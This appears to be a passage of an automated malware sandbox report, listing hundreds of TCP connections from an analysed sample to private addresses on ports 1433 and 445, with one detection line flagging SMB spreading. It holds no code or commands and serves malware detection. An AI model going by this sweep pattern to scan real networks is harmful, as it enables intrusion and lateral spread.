Source: global trafficTCP traffic: 192.168.1.174:1433
Source: global trafficTCP traffic: 192.168.1.175:1433
Source: global trafficTCP traffic: 192.168.1.170:1433
Source: global trafficTCP traffic: 192.168.1.171:1433
Source: global trafficTCP traffic: 192.168.0.138:1433
Source: global trafficTCP traffic: 192.168.0.137:1433
Source: global trafficTCP traffic: 192.168.0.139:1433
Source: global trafficTCP traffic: 192.168.0.134:1433
Source: global trafficTCP traffic: 192.168.0.133:1433
Source: global trafficTCP traffic: 192.168.0.254:1433
Source: global trafficTCP traffic: 192.168.0.136:1433
Source: global trafficTCP traffic: 192.168.0.135:1433
Source: global trafficTCP traffic: 192.168.0.251:1433
Source: global trafficTCP traffic: 192.168.0.130:1433
Source: global trafficTCP traffic: 192.168.0.250:1433
Source: global trafficTCP traffic: 192.168.0.253:1433
Source: global trafficTCP traffic: 192.168.0.132:1433
Source: global trafficTCP traffic: 192.168.0.252:1433
Source: global trafficTCP traffic: 192.168.0.131:1433
Source: global trafficTCP traffic: 192.168.1.169:1433
Source: global trafficTCP traffic: 192.168.1.165:1433
Source: global trafficTCP traffic: 192.168.1.166:1433
Source: global trafficTCP traffic: 192.168.1.167:1433
Source: global trafficTCP traffic: 192.168.1.168:1433
Source: global trafficTCP traffic: 192.168.1.161:1433
Source: global trafficTCP traffic: 192.168.1.162:1433
Source: global trafficTCP traffic: 192.168.1.163:1433
Source: global trafficTCP traffic: 192.168.1.164:1433
Source: global trafficTCP traffic: 192.168.1.160:1433
Source: global trafficTCP traffic: 192.168.0.248:1433
Source: global trafficTCP traffic: 192.168.0.127:1433
Source: global trafficTCP traffic: 192.168.0.247:1433
Source: global trafficTCP traffic: 192.168.0.126:1433
Source: global trafficTCP traffic: 192.168.0.129:1433
Source: global trafficTCP traffic: 192.168.0.249:1433
Source: global trafficTCP traffic: 192.168.0.128:1433
Source: global trafficTCP traffic: 192.168.0.123:1433
Source: global trafficTCP traffic: 192.168.0.244:1433
Source: global trafficTCP traffic: 192.168.0.122:1433
Source: global trafficTCP traffic: 192.168.0.243:1433
Source: global trafficTCP traffic: 192.168.0.125:1433
Source: global trafficTCP traffic: 192.168.0.246:1433
Source: global trafficTCP traffic: 192.168.0.124:1433
Source: global trafficTCP traffic: 192.168.0.245:1433
Source: global trafficTCP traffic: 192.168.0.240:1433
Source: global trafficTCP traffic: 192.168.0.242:1433
Source: global trafficTCP traffic: 192.168.0.121:1433
Source: global trafficTCP traffic: 192.168.0.241:1433
Source: global trafficTCP traffic: 192.168.0.120:1433
Source: global trafficTCP traffic: 192.168.0.150:1433
Source: global trafficTCP traffic: 192.168.1.198:1433
Source: global trafficTCP traffic: 192.168.1.199:1433
Source: global trafficTCP traffic: 192.168.1.194:1433
Source: global trafficTCP traffic: 192.168.1.195:1433
Source: global trafficTCP traffic: 192.168.1.196:1433
Source: global trafficTCP traffic: 192.168.1.197:1433
Source: global trafficTCP traffic: 192.168.1.190:1433
Source: global trafficTCP traffic: 192.168.1.191:1433
Source: global trafficTCP traffic: 192.168.1.192:1433
Source: global trafficTCP traffic: 192.168.1.193:1433
Source: global trafficTCP traffic: 192.168.0.159:1433
Source: global trafficTCP traffic: 192.168.0.156:1433
Source: global trafficTCP traffic: 192.168.0.155:1433
Source: global trafficTCP traffic: 192.168.0.158:1433
Source: global trafficTCP traffic: 192.168.0.157:1433
Source: global trafficTCP traffic: 192.168.0.152:1433
Source: global trafficTCP traffic: 192.168.0.151:1433
Source: global trafficTCP traffic: 192.168.0.154:1433
Source: global trafficTCP traffic: 192.168.0.153:1433
Source: global trafficTCP traffic: 192.168.1.187:1433
Source: global trafficTCP traffic: 192.168.1.188:1433
Source: global trafficTCP traffic: 192.168.1.189:1433
Source: global trafficTCP traffic: 192.168.1.183:1433
Source: global trafficTCP traffic: 192.168.1.184:1433
Source: global trafficTCP traffic: 192.168.1.185:1433
Source: global trafficTCP traffic: 192.168.1.186:1433
Source: global trafficTCP traffic: 192.168.1.180:1433
Source: global trafficTCP traffic: 192.168.1.181:1433
Source: global trafficTCP traffic: 192.168.1.182:1433
Source: global trafficTCP traffic: 192.168.0.149:1433
Source: global trafficTCP traffic: 192.168.0.148:1433
Source: global trafficTCP traffic: 192.168.0.145:1433
Source: global trafficTCP traffic: 192.168.0.144:1433
Source: global trafficTCP traffic: 192.168.0.147:1433
Source: global trafficTCP traffic: 192.168.0.146:1433
Source: global trafficTCP traffic: 192.168.0.141:1433
Source: global trafficTCP traffic: 192.168.0.140:1433
Source: global trafficTCP traffic: 192.168.0.143:1433
Source: global trafficTCP traffic: 192.168.0.142:1433
Source: global trafficTCP traffic: 192.168.1.136:1433
Source: global trafficTCP traffic: 192.168.1.137:1433
Source: global trafficTCP traffic: 192.168.1.138:1433
Source: global trafficTCP traffic: 192.168.1.139:1433
Source: global trafficTCP traffic: 192.168.1.132:1433
Source: global trafficTCP traffic: 192.168.1.253:445
Source: global trafficTCP traffic: 192.168.1.133:1433
Source: global trafficTCP traffic: 192.168.1.254:445
Source: global trafficTCP traffic: 192.168.1.134:1433
Source: global trafficTCP traffic: 192.168.1.135:1433
Source: global trafficTCP traffic: 192.168.1.250:445
Source: global trafficTCP traffic: 192.168.1.130:1433
Source: global trafficTCP traffic: 192.168.1.251:445
Source: global trafficTCP traffic: 192.168.1.131:1433
Source: global trafficTCP traffic: 192.168.1.252:445
Source: global trafficTCP traffic: 192.168.0.219:1433
Source: global trafficTCP traffic: 192.168.0.218:1433
Source: global trafficTCP traffic: 192.168.0.215:1433
Source: global trafficTCP traffic: 192.168.0.214:1433
Source: global trafficTCP traffic: 192.168.0.217:1433
Source: global trafficTCP traffic: 192.168.0.216:1433
Source: global trafficTCP traffic: 192.168.0.211:1433
Source: global trafficTCP traffic: 192.168.0.210:1433
Source: global trafficTCP traffic: 192.168.0.213:1433
Source: global trafficTCP traffic: 192.168.0.212:1433
Source: global trafficTCP traffic: 192.168.1.129:1433
Source: global trafficTCP traffic: 192.168.1.125:1433
Source: global trafficTCP traffic: 192.168.1.246:445
Source: global trafficTCP traffic: 192.168.1.126:1433
Source: global trafficTCP traffic: 192.168.1.247:445
Source: global trafficTCP traffic: 192.168.1.127:1433
Source: global trafficTCP traffic: 192.168.1.248:445
Source: global trafficTCP traffic: 192.168.1.128:1433
Source: global trafficTCP traffic: 192.168.1.249:445
Source: global trafficTCP traffic: 192.168.1.121:1433
Source: global trafficTCP traffic: 192.168.1.242:445
Source: global trafficTCP traffic: 192.168.1.122:1433
Source: global trafficTCP traffic: 192.168.1.243:445
Source: global trafficTCP traffic: 192.168.1.123:1433
Source: global trafficTCP traffic: 192.168.1.244:445
Source: global trafficTCP traffic: 192.168.1.124:1433
Source: global trafficTCP traffic: 192.168.1.245:445
Source: global trafficTCP traffic: 192.168.1.240:445
Source: global trafficTCP traffic: 192.168.1.120:1433
Source: global trafficTCP traffic: 192.168.1.241:445
Source: global trafficTCP traffic: 192.168.0.208:1433
Source: global trafficTCP traffic: 192.168.0.207:1433
Source: global trafficTCP traffic: 192.168.0.209:1433
Source: global trafficTCP traffic: 192.168.0.204:1433
Source: global trafficTCP traffic: 192.168.0.203:1433
Source: global trafficTCP traffic: 192.168.0.206:1433
Source: global trafficTCP traffic: 192.168.0.205:1433
Source: global trafficTCP traffic: 192.168.0.200:1433
Source: global trafficTCP traffic: 192.168.0.202:1433
Source: global trafficTCP traffic: 192.168.0.201:1433
Source: global trafficTCP traffic: 192.168.1.158:1433
Source: global trafficTCP traffic: 192.168.1.159:1433
Source: global trafficTCP traffic: 192.168.1.154:1433
Source: global trafficTCP traffic: 192.168.1.155:1433
Source: global trafficTCP traffic: 192.168.1.156:1433
Source: global trafficTCP traffic: 192.168.1.157:1433
Source: global trafficTCP traffic: 192.168.1.150:1433
Source: global trafficTCP traffic: 192.168.1.151:1433
Source: global trafficTCP traffic: 192.168.1.152:1433
Source: global trafficTCP traffic: 192.168.1.153:1433
Source: global trafficTCP traffic: 192.168.0.119:1433
Source: global trafficTCP traffic: 192.168.0.116:1433
Source: global trafficTCP traffic: 192.168.0.237:1433
Source: global trafficTCP traffic: 192.168.0.236:1433
Source: global trafficTCP traffic: 192.168.0.115:1433
Source: global trafficTCP traffic: 192.168.0.118:1433
Source: global trafficTCP traffic: 192.168.0.239:1433
Source: global trafficTCP traffic: 192.168.0.117:1433
Source: global trafficTCP traffic: 192.168.0.238:1433
Source: global trafficTCP traffic: 192.168.0.112:1433
Source: global trafficTCP traffic: 192.168.0.233:1433
Source: global trafficTCP traffic: 192.168.0.111:1433
Source: global trafficTCP traffic: 192.168.0.232:1433
Source: global trafficTCP traffic: 192.168.0.235:1433
Source: global trafficTCP traffic: 192.168.0.114:1433
Source: global trafficTCP traffic: 192.168.0.113:1433
Source: global trafficTCP traffic: 192.168.0.234:1433
Source: global trafficTCP traffic: 192.168.0.231:1433
Source: global trafficTCP traffic: 192.168.0.110:1433
Source: global trafficTCP traffic: 192.168.0.230:1433
Source: global trafficTCP traffic: 192.168.1.147:1433
Source: global trafficTCP traffic: 192.168.1.148:1433
Source: global trafficTCP traffic: 192.168.1.149:1433
Source: global trafficTCP traffic: 192.168.1.143:1433
Source: global trafficTCP traffic: 192.168.1.144:1433
Source: global trafficTCP traffic: 192.168.1.145:1433
Source: global trafficTCP traffic: 192.168.1.146:1433
Source: global trafficTCP traffic: 192.168.1.140:1433
Source: global trafficTCP traffic: 192.168.1.141:1433
Source: global trafficTCP traffic: 192.168.1.142:1433
Source: global trafficTCP traffic: 192.168.0.109:1433
Source: global trafficTCP traffic: 192.168.0.229:1433
Source: global trafficTCP traffic: 192.168.0.108:1433
Source: global trafficTCP traffic: 192.168.0.226:1433
Source: global trafficTCP traffic: 192.168.0.105:1433
Source: global trafficTCP traffic: 192.168.0.225:1433
Source: global trafficTCP traffic: 192.168.0.104:1433
Source: global trafficTCP traffic: 192.168.0.107:1433
Source: global trafficTCP traffic: 192.168.0.228:1433
Source: global trafficTCP traffic: 192.168.0.106:1433
Source: global trafficTCP traffic: 192.168.0.227:1433
Source: global trafficTCP traffic: 192.168.0.101:1433
Connects to many different private IPs via SMB (likely to spread or exploit)
Source: global trafficTCP traffic: 192.168.1.217:445
Source: global trafficTCP traffic: 192.168.1.218:445
Source: global trafficTCP traffic: 192.168.1.219:445
Source: global trafficTCP traffic: 192.168.1.213:445
Source: global trafficTCP traffic: 192.168.1.214:445
Source: global trafficTCP traffic: 192.168.1.215:445
Source: global trafficTCP traffic: 192.168.1.216:445
Source: global trafficTCP traffic: 192.168.1.210:445
Source: global trafficTCP traffic: 192.168.1.211:445
Source: global trafficTCP traffic: 192.168.1.212:445
Source: global trafficTCP traffic: 192.168.1.206:445
Source: global trafficTCP traffic: 192.168.1.207:445
Source: global trafficTCP traffic: 192.168.1.208:445
Source: global trafficTCP traffic: 192.168.1.209:445
Source: global trafficTCP traffic: 192.168.1.202:445
Source: global trafficTCP traffic: 192.168.1.203:445
Source: global trafficTCP traffic: 192.168.1.204:445
Source: global trafficTCP traffic: 192.168.1.205:445
Source: global trafficTCP traffic: 192.168.1.200:445
Source: global trafficTCP traffic: 192.168.1.201:445
Source: global trafficTCP traffic: 192.168.1.118:445
Source: global trafficTCP traffic: 192.168.1.239:445
Source: global trafficTCP traffic: 192.168.1.119:445
Source: global trafficTCP traffic: 192.168.1.114:445
Source: global trafficTCP traffic: 192.168.1.235:445
Source: global trafficTCP traffic: 192.168.1.115:445
Source: global trafficTCP traffic: 192.168.1.236:445
Source: global trafficTCP traffic: 192.168.1.116:445
Source: global trafficTCP traffic: 192.168.1.237:445
Source: global trafficTCP traffic: 192.168.1.117:445
Source: global trafficTCP traffic: 192.168.1.238:445
Source: global trafficTCP traffic: 192.168.1.110:445
Source: global trafficTCP traffic: 192.168.1.231:445
Source: global trafficTCP traffic: 192.168.1.111:445
Source: global trafficTCP traffic: 192.168.1.232:445
Source: global trafficTCP traffic: 192.168.1.112:445
Source: global trafficTCP traffic: 192.168.1.233:445
Source: global trafficTCP traffic: 192.168.1.113:445
Source: global trafficTCP traffic: 192.168.1.234:445
Source: global trafficTCP traffic: 192.168.1.230:445
Source: global trafficTCP traffic: 192.168.1.107:445
Source: global trafficTCP traffic: 192.168.1.228:445
Source: global trafficTCP traffic: 192.168.1.108:445
Source: global trafficTCP traffic: 192.168.1.229:445
Source: global trafficTCP traffic: 192.168.1.109:445
Source: global trafficTCP traffic: 192.168.1.103:445
Source: global trafficTCP traffic: 192.168.1.224:445
Source: global trafficTCP traffic: 192.168.1.104:445
Source: global trafficTCP traffic: 192.168.1.225:445
Source: global trafficTCP traffic: 192.168.1.105:445
Source: global trafficTCP traffic: 192.168.1.226:445
Source: global trafficTCP traffic: 192.168.1.106:445
Source: global trafficTCP traffic: 192.168.1.227:445
Source: global trafficTCP traffic: 192.168.1.220:445
Source: global trafficTCP traffic: 192.168.1.100:445
Source: global trafficTCP traffic: 192.168.1.221:445
Source: global trafficTCP traffic: 192.168.1.101:445
Source: global trafficTCP traffic: 192.168.1.222:445
Source: global trafficTCP traffic: 192.168.1.102:445
Source: global trafficTCP traffic: 192.168.1.223:445
Source: global trafficTCP traffic: 192.168.1.74:445
Source: global trafficTCP traffic: 192.168.1.73:445
Source: global trafficTCP traffic: 192.168.1.76:445
Source: global trafficTCP traffic: 192.168.1.75:445
Source: global trafficTCP traffic: 192.168.1.78:445
Source: global trafficTCP traffic: 192.168.1.77:445
Source: global trafficTCP traffic: 192.168.1.79:445
Source: global trafficTCP traffic: 192.168.1.70:445
Source: global trafficTCP traffic: 192.168.1.72:445
Source: global trafficTCP traffic: 192.168.1.71:445
Source: global trafficTCP traffic: 192.168.1.59:445
Source: global trafficTCP traffic: 192.168.0.94:445
Source: global trafficTCP traffic: 192.168.1.63:445
Source: global trafficTCP traffic: 192.168.0.95:445
Source: global trafficTCP traffic: 192.168.1.62:445
Source: global trafficTCP traffic: 192.168.0.96:445
Source: global trafficTCP traffic: 192.168.1.65:445
Source: global trafficTCP traffic: 192.168.0.97:445
Source: global trafficTCP traffic: 192.168.1.64:445
Source: global trafficTCP traffic: 192.168.0.98:445
Source: global trafficTCP traffic: 192.168.1.67:445
Source: global trafficTCP traffic: 192.168.0.99:445
Source: global trafficTCP traffic: 192.168.1.66:445
Source: global trafficTCP traffic: 192.168.1.69:445
Source: global trafficTCP traffic: 192.168.1.68:445
Source: global trafficTCP traffic: 192.168.0.90:445
Source: global trafficTCP traffic: 192.168.0.91:445
Source: global trafficTCP traffic: 192.168.0.92:445
Source: global trafficTCP traffic: 192.168.1.61:445
Source: global trafficTCP traffic: 192.168.0.93:445
Source: global trafficTCP traffic: 192.168.1.60:445
Source: global trafficTCP traffic: 192.168.1.49:445
Source: global trafficTCP traffic: 192.168.1.48:445
Source: global trafficTCP traffic: 192.168.0.83:445
Source: global trafficTCP traffic: 192.168.1.52:445
Source: global trafficTCP traffic: 192.168.0.84:445
Source: global trafficTCP traffic: 192.168.1.51:445
Source: global trafficTCP traffic: 192.168.0.85:445
Source: global trafficTCP traffic: 192.168.1.54:445
Source: global trafficTCP traffic: 192.168.0.86:445
Source: global trafficTCP traffic: 192.168.1.53:445
Source: global trafficTCP traffic: 192.168.0.87:445
Source: global trafficTCP traffic: 192.168.1.56:445
Source: global trafficTCP traffic: 192.168.0.88:445
Source: global trafficTCP traffic: 192.168.1.55:445
Source: global trafficTCP traffic: 192.168.0.89:445
Source: global trafficTCP traffic: 192.168.1.58:445
Source: global trafficTCP traffic: 192.168.1.57:445
Source: global trafficTCP traffic: 192.168.0.80:445
Source: global trafficTCP traffic: 192.168.0.81:445
Source: global trafficTCP traffic: 192.168.1.50:445
Source: global trafficTCP traffic: 192.168.0.82:445
Source: global trafficTCP traffic: 192.168.0.69:445
Source: global trafficTCP traffic: 192.168.1.38:445
Source: global trafficTCP traffic: 192.168.1.37:445
Source: global trafficTCP traffic: 192.168.1.39:445
Source: global trafficTCP traffic: 192.168.0.72:445
Source: global trafficTCP traffic: 192.168.1.41:445
Source: global trafficTCP traffic: 192.168.0.73:445
Source: global trafficTCP traffic: 192.168.1.40:445
Source: global trafficTCP traffic: 192.168.0.74:445
Source: global trafficTCP traffic: 192.168.1.43:445
Source: global trafficTCP traffic: 192.168.0.75:445
Source: global trafficTCP traffic: 192.168.1.42:445
Source: global trafficTCP traffic: 192.168.0.76:445
Source: global trafficTCP traffic: 192.168.1.45:445
Source: global trafficTCP traffic: 192.168.0.77:445
Source: global trafficTCP traffic: 192.168.1.44:445
Source: global trafficTCP traffic: 192.168.0.78:445
Source: global trafficTCP traffic: 192.168.1.47:445
Source: global trafficTCP traffic: 192.168.0.79:445
Source: global trafficTCP traffic: 192.168.1.46:445
Source: global trafficTCP traffic: 192.168.0.70:445
Source: global trafficTCP traffic: 192.168.0.71:445
Source: global trafficTCP traffic: 192.168.1.96:445
Source: global trafficTCP traffic: 192.168.1.95:445
Source: global trafficTCP traffic: 192.168.1.98:445
Source: global trafficTCP traffic: 192.168.1.97:445
Source: global trafficTCP traffic: 192.168.1.99:445
Source: global trafficTCP traffic: 192.168.1.90:445
Source: global trafficTCP traffic: 192.168.1.92:445
Source: global trafficTCP traffic: 192.168.1.91:445
Source: global trafficTCP traffic: 192.168.1.94:445
Source: global trafficTCP traffic: 192.168.1.93:445
Source: global trafficTCP traffic: 192.168.1.85:445
Source: global trafficTCP traffic: 192.168.1.84:445
Source: global trafficTCP traffic: 192.168.1.87:445
Source: global trafficTCP traffic: 192.168.1.86:445
Source: global trafficTCP traffic: 192.168.1.89:445
Source: global trafficTCP traffic: 192.168.1.88:445
Source: global trafficTCP traffic: 192.168.1.81:445
Source: global trafficTCP traffic: 192.168.1.80:445
Source: global trafficTCP traffic: 192.168.1.83:445
Source: global trafficTCP traffic: 192.168.1.82:445
Source: global trafficTCP traffic: 192.168.0.2:445
Source: global trafficTCP traffic: 192.168.0.1:445
Source: global trafficTCP traffic: 192.168.0.4:445
Source: global trafficTCP traffic: 192.168.0.3:445
Source: global trafficTCP traffic: 192.168.0.14:445
Source: global trafficTCP traffic: 192.168.0.9:445
Source: global trafficTCP traffic: 192.168.0.15:445
Source: global trafficTCP traffic: 192.168.0.16:445
Source: global trafficTCP traffic: 192.168.0.17:445
Source: global trafficTCP traffic: 192.168.0.6:445
Source: global trafficTCP traffic: 192.168.0.18:445
Source: global trafficTCP traffic: 192.168.0.5:445
Source: global trafficTCP traffic: 192.168.0.19:445
Source: global trafficTCP traffic: 192.168.0.8:445
Source: global trafficTCP traffic: 192.168.0.7:445
Source: global trafficTCP traffic: 192.168.0.20:445
Source: global trafficTCP traffic: 192.168.0.21:445
Source: global trafficTCP traffic: 192.168.0.22:445
Source: global trafficTCP traffic: 192.168.0.23:445
Source: global trafficTCP traffic: 192.168.0.24:445
Source: global trafficTCP traffic: 192.168.0.10:445
Source: global trafficTCP traffic: 192.168.0.11:445
Source: global trafficTCP traffic: 192.168.0.12:445
Source: global trafficTCP traffic: 192.168.0.13:445
Source: global trafficTCP traffic: 192.168.1.1:445
Source: global trafficTCP traffic: 192.168.1.3:445
Source: global trafficTCP traffic: 192.168.1.2:445
Source: global trafficTCP traffic: 192.168.1.9:445
Source: global trafficTCP traffic: 192.168.1.8:445
Source: global trafficTCP traffic: 192.168.1.5:445
Source: global trafficTCP traffic: 192.168.1.4:445
Source: global trafficTCP traffic: 192.168.1.7:445
Source: global trafficTCP traffic: 192.168.1.6:445
Source: global trafficTCP traffic: 192.168.0.170:445
Source: global trafficTCP traffic: 192.168.0.172:445
Source: global trafficTCP traffic: 192.168.0.171:445
Source: global trafficTCP traffic: 192.168.0.58:445
Source: global trafficTCP traffic: 192.168.1.27:445
Source: global trafficTCP traffic: 192.168.0.59:445
Source: global trafficTCP traffic: 192.168.1.26:445
Source: global trafficTCP traffic: 192.168.1.29:445
Source: global trafficTCP traffic: 192.168.1.28:445
Source: global trafficTCP traffic: 192.168.0.61:445
Source: global trafficTCP traffic: 192.168.1.30:445
Source: global trafficTCP traffic: 192.168.0.62:445
Source: global trafficTCP traffic: 192.168.0.63:445
Source: global trafficTCP traffic: 192.168.1.32:445
Source: global trafficTCP traffic: 192.168.0.64:445
Source: global trafficTCP traffic: 192.168.1.31:445
Source: global trafficTCP traffic: 192.168.0.65:445
Source: global trafficTCP traffic: 192.168.1.34:445
Source: global trafficTCP traffic: 192.168.0.66:445
Source: global trafficTCP traffic: 192.168.1.33:445
Source: global trafficTCP traffic: 192.168.0.67:445
Source: global trafficTCP traffic: 192.168.1.36:445
Source: global trafficTCP traffic: 192.168.0.68:445
Source: global trafficTCP traffic: 192.168.1.35:445
Source: global trafficTCP traffic: 192.168.0.178:445
Source: global trafficTCP traffic: 192.168.0.177:445
Source: global trafficTCP traffic: 192.168.0.179:445
Source: global trafficTCP traffic: 192.168.0.174:445
Source: global trafficTCP traffic: 192.168.0.173:445
Source: global trafficTCP traffic: 192.168.0.176:445
Source: global trafficTCP traffic: 192.168.0.60:445
Source: global trafficTCP traffic: 192.168.0.175:445
Source: global trafficTCP traffic: 192.168.0.161:445
Source: global trafficTCP traffic: 192.168.0.160:445
Source: global trafficTCP traffic: 192.168.0.47:445
Source: global trafficTCP traffic: 192.168.1.16:445
Source: global trafficTCP traffic: 192.168.0.48:445
Source: global trafficTCP traffic: 192.168.1.15:445
Source: global trafficTCP traffic: 192.168.0.49:445
Source: global trafficTCP traffic: 192.168.1.18:445
Source: global trafficTCP traffic: 192.168.1.17:445
Source: global trafficTCP traffic: 192.168.1.19:445
Source: global trafficTCP traffic: 192.168.0.50:445
Source: global trafficTCP traffic: 192.168.0.51:445
Source: global trafficTCP traffic: 192.168.0.52:445
Source: global trafficTCP traffic: 192.168.1.21:445
Source: global trafficTCP traffic: 192.168.0.53:445
Source: global trafficTCP traffic: 192.168.1.20:445
Source: global trafficTCP traffic: 192.168.0.54:445
Source: global trafficTCP traffic: 192.168.1.23:445
Source: global trafficTCP traffic: 192.168.0.55:445
Source: global trafficTCP traffic: 192.168.1.22:445
Source: global trafficTCP traffic: 192.168.0.56:445
Source: global trafficTCP traffic: 192.168.1.25:445
Source: global trafficTCP traffic: 192.168.0.57:445
Source: global trafficTCP traffic: 192.168.1.24:445
Source: global trafficTCP traffic: 192.168.0.167:445
Source: global trafficTCP traffic: 192.168.0.166:445
Source: global trafficTCP traffic: 192.168.0.169:445
Source: global trafficTCP traffic: 192.168.0.168:445
Source: global trafficTCP traffic: 192.168.0.163:445
Source: global trafficTCP traffic: 192.168.0.162:445
Source: global trafficTCP traffic: 192.168.0.165:445
Source: global trafficTCP traffic: 192.168.0.164:445
Source: global trafficTCP traffic: 192.168.0.192:445
Source: global trafficTCP traffic: 192.168.0.191:445
Source: global trafficTCP traffic: 192.168.0.194:445
Source: global trafficTCP traffic: 192.168.0.193:445
Source: global trafficTCP traffic: 192.168.0.190:445
Source: global trafficTCP traffic: 192.168.0.36:445
Source: global trafficTCP traffic: 192.168.0.37:445
Source: global trafficTCP traffic: 192.168.0.38:445
Source: global trafficTCP traffic: 192.168.0.39:445
Source: global trafficTCP traffic: 192.168.0.40:445
Source: global trafficTCP traffic: 192.168.0.41:445
Source: global trafficTCP traffic: 192.168.1.10:445
Source: global trafficTCP traffic: 192.168.0.42:445
Source: global trafficTCP traffic: 192.168.0.43:445
Source: global trafficTCP traffic: 192.168.1.12:445
Source: global trafficTCP traffic: 192.168.0.44:445
Source: global trafficTCP traffic: 192.168.1.11:445
Source: global trafficTCP traffic: 192.168.0.45:445
Source: global trafficTCP traffic: 192.168.1.14:445
Source: global trafficTCP traffic: 192.168.0.46:445
Source: global trafficTCP traffic: 192.168.1.13:445
Source: global trafficTCP traffic: 192.168.0.199:445
Source: global trafficTCP traffic: 192.168.0.196:445
Source: global trafficTCP traffic: 192.168.0.195:445
Source: global trafficTCP traffic: 192.168.0.198:445
Source: global trafficTCP traffic: 192.168.0.197:445
Source: global trafficTCP traffic: 192.168.0.181:445
Source: global trafficTCP traffic: 192.168.0.180:445
Source: global trafficTCP traffic: 192.168.0.183:445
Source: global trafficTCP traffic: 192.168.0.182:445
Source: global trafficTCP traffic: 192.168.0.25:445
Source: global trafficTCP traffic: 192.168.0.26:445
Source: global trafficTCP traffic: 192.168.0.27:445
Source: global trafficTCP traffic: 192.168.0.28:445
Source: global trafficTCP traffic: 192.168.0.29:445
Source: global trafficTCP traffic: 192.168.0.30:445
Source: global trafficTCP traffic: 192.168.0.31:445
Source: global trafficTCP traffic: 192.168.0.32:445
Source: global trafficTCP traffic: 192.168.0.33:445
Source: global trafficTCP traffic: 192.168.0.34:445
Source: global trafficTCP traffic: 192.168.0.35:445
Source: global trafficTCP traffic: 192.168.0.189:445
Source: global trafficTCP traffic: 192.168.0.188:445
Source: global trafficTCP traffic: 192.168.0.185:445
Source: global trafficTCP traffic: 192.168.0.184:445
Source: global trafficTCP traffic: 192.168.0.187:445
Source: global trafficTCP traffic: 192.168.0.186:445
Source: global trafficTCP traffic: 192.168.1.176:445
Source: global trafficTCP traffic: 192.168.1.177:445
Source: global trafficTCP traffic: 192.168.1.178:445
Source: global trafficTCP traffic: 192.168.1.179:445
Source: global trafficTCP traffic: 192.168.1.172:445
Source: global trafficTCP traffic: 192.168.1.173:445
Source: global trafficTCP traffic: 192.168.1.174:445
Source: global trafficTCP traffic: 192.168.1.175:445
Source: global trafficTCP traffic: 192.168.1.170:445
Source: global trafficTCP traffic: 192.168.1.171:445
Source: global trafficTCP traffic: 192.168.0.138:445
Source: global trafficTCP traffic: 192.168.0.137:445
Source: global trafficTCP traffic: 192.168.0.139:445
Source: global trafficTCP traffic: 192.168.0.134:445
Source: global trafficTCP traffic: 192.168.0.133:445
Source: global trafficTCP traffic: 192.168.0.254:445
Source: global trafficTCP traffic: 192.168.0.136:445
Source: global trafficTCP traffic: 192.168.0.135:445
Source: global trafficTCP traffic: 192.168.0.251:445
Source: global trafficTCP traffic: 192.168.0.130:445
Source: global trafficTCP traffic: 192.168.0.250:445
Source: global trafficTCP traffic: 192.168.0.253:445
Source: global trafficTCP traffic: 192.168.0.132:445
Source: global trafficTCP traffic: 192.168.0.252:445
Source: global trafficTCP traffic: 192.168.0.131:445
Source: global trafficTCP traffic: 192.168.1.169:445
Source: global trafficTCP traffic: 192.168.1.165:445
Source: global trafficTCP traffic: 192.168.1.166:445
Source: global trafficTCP traffic: 192.168.1.167:445
Source: global trafficTCP traffic: 192.168.1.168:445
Source: global trafficTCP traffic: 192.168.1.161:445
Source: global trafficTCP traffic: 192.168.1.162:445
Source: global trafficTCP traffic: 192.168.1.163:445
Source: global trafficTCP traffic: 192.168.1.164:445
Source: global trafficTCP traffic: 192.168.1.160:445
Source: global trafficTCP traffic: 192.168.0.248:445
Source: global trafficTCP traffic: 192.168.0.127:445
Source: global trafficTCP traffic: 192.168.0.247:445
Source: global trafficTCP traffic: 192.168.0.126:445
Source: global trafficTCP traffic: 192.168.0.129:445
Source: global trafficTCP traffic: 192.168.0.249:445
Source: global trafficTCP traffic: 192.168.0.128:445
Source: global trafficTCP traffic: 192.168.0.123:445
Source: global trafficTCP traffic: 192.168.0.244:445
Source: global trafficTCP traffic: 192.168.0.122:445
Source: global trafficTCP traffic: 192.168.0.243:445
Source: global trafficTCP traffic: 192.168.0.125:445
Source: global trafficTCP traffic: 192.168.0.246:445
Source: global trafficTCP traffic: 192.168.0.124:445
Source: global trafficTCP traffic: 192.168.0.245:445
Source: global trafficTCP traffic: 192.168.0.240:445
Source: global trafficTCP traffic: 192.168.0.242:445
Source: global trafficTCP traffic: 192.168.0.121:445
Source: global trafficTCP traffic: 192.168.0.241:445
Source: global trafficTCP traffic: 192.168.0.120:445
Source: global trafficTCP traffic: 192.168.0.150:445
Source: global trafficTCP traffic: 192.168.1.198:445
Source: global trafficTCP traffic: 192.168.1.199:445
Source: global trafficTCP traffic: 192.168.1.194:445
Source: global trafficTCP traffic: 192.168.1.195:445
Source: global trafficTCP traffic: 192.168.1.196:445
Source: global trafficTCP traffic: 192.168.1.197:445
Source: global trafficTCP traffic: 192.168.1.190:445
Source: global trafficTCP traffic: 192.168.1.191:445
Source: global trafficTCP traffic: 192.168.1.192:445
Source: global trafficTCP traffic: 192.168.1.193:445
Source: global trafficTCP traffic: 192.168.0.159:445
Source: global trafficTCP traffic: 192.168.0.156:445
Source: global trafficTCP traffic: 192.168.0.155:445
Source: global trafficTCP traffic: 192.168.0.158:445
Source: global trafficTCP traffic: 192.168.0.157:445
Source: global trafficTCP traffic: 192.168.0.152:445
Source: global trafficTCP traffic: 192.168.0.151:445
Source: global trafficTCP traffic: 192.168.0.154:445
Source: global trafficTCP traffic: 192.168.0.153:445
Source: global trafficTCP traffic: 192.168.1.187:445
Source: global trafficTCP traffic: 192.168.1.188:445
Source: global trafficTCP traffic: 192.168.1.189:445
Source: global trafficTCP traffic: 192.168.1.183:445
Source: global trafficTCP traffic: 192.168.1.184:445
Source: global trafficTCP traffic: 192.168.1.185:445
Source: global trafficTCP traffic: 192.168.1.186:445
Source: global trafficTCP traffic: 192.168.1.180:445
Source: global trafficTCP traffic: 192.168.1.181:445
Source: global trafficTCP traffic: 192.168.1.182:445
Source: global trafficTCP traffic: 192.168.0.149:445
Source: global trafficTCP traffic: 192.168.0.148:445
Source: global trafficTCP traffic: 192.168.0.145:445
Source: global trafficTCP traffic: 192.168.0.144:445
Source: global trafficTCP traffic: 192.168.0.147:445
Source: global trafficTCP traffic: 192.168.0.146:445
Source: global trafficTCP traffic: 192.168.0.141:445
Source: global trafficTCP traffic: 192.168.0.140:445
Source: global trafficTCP traffic: 192.168.0.143:445
Source: global trafficTCP traffic: 192.168.0.142:445
Source: global trafficTCP traffic: 192.168.1.136:445
Source: global trafficTCP traffic: 192.168.1.137:445
